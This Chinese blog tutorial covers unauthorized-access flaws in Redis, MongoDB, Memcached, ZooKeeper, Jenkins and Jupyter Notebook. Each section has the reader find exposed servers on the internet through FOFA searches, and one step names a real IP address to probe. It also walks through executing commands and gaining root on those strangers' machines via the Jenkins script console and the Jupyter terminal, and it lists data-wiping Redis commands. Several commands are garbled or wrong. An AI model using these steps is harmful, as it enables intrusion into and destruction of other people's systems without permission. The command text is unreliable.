未授权访问漏洞系列详解

一、Redis未授权访问漏洞

1.在fofa上搜索 port="6379"找到一个具有未授权访问漏洞的网页(6379为默认的redis端口号)

2.在kali里安装redis 命令为:apt install redis

3.安装成功后输入redis-cli -h ip地址 -p 6379,进入后输入info显示成功

#redis常见命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使用selectnum可以查看键值数据
(5)设置变量:set test"whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称

二、MongoDB未授权访问漏洞

1.因为mongoDB的默认端口为27017,我们直接在fofa上搜索 port="27017"(搜索端口号为27017的网站)

2.打开navicat进行连接连接名任意,主机填写找到的网址,点击测试连接,提示连接成功证明存在漏洞

三、Memcached未授权访问漏洞

Windows 下安装 Memcached | 菜鸟教程  下载64位1.4.5版本的

1.解压好在此目录打开命令行

2.在命令行输入memcached.exe -d install、memcached.exe -d start

3.打开kali输入telnet 存在漏洞的ip 11211进行telnet侦测

4.输入stats,查看memcache服务状态

5.使用Nmap程序的脚本进行漏洞扫描,nmap -p 11211 --script memcached-info ip地址

四、Zookeeper未授权访问漏洞

1.使用fofa搜索端口号为2181的网站

2.在kali中输入 echo envinc 114.242.175.75 2181 进行未授权访问漏洞测试

五、Jenkins未授权漏洞

1.在fofa中搜索 port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

2.在打开的页面地址栏后加/manage/script/index.php进入

3.在其中输入println "'whoami".execute().text找到他的用户名

六、Jupyter NoteBook未授权访问漏洞

1.在fofa中搜索"Jupyter Notebook" && port="8888" && "terminals"

2.找到一个不需要密码的网站证明存在未授权访问漏洞,并且会直接跳到web管理界面

3.点击new-->termial新建一个终端

4.输入whomi、ls以及sudo su 进入root证明存在漏洞

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值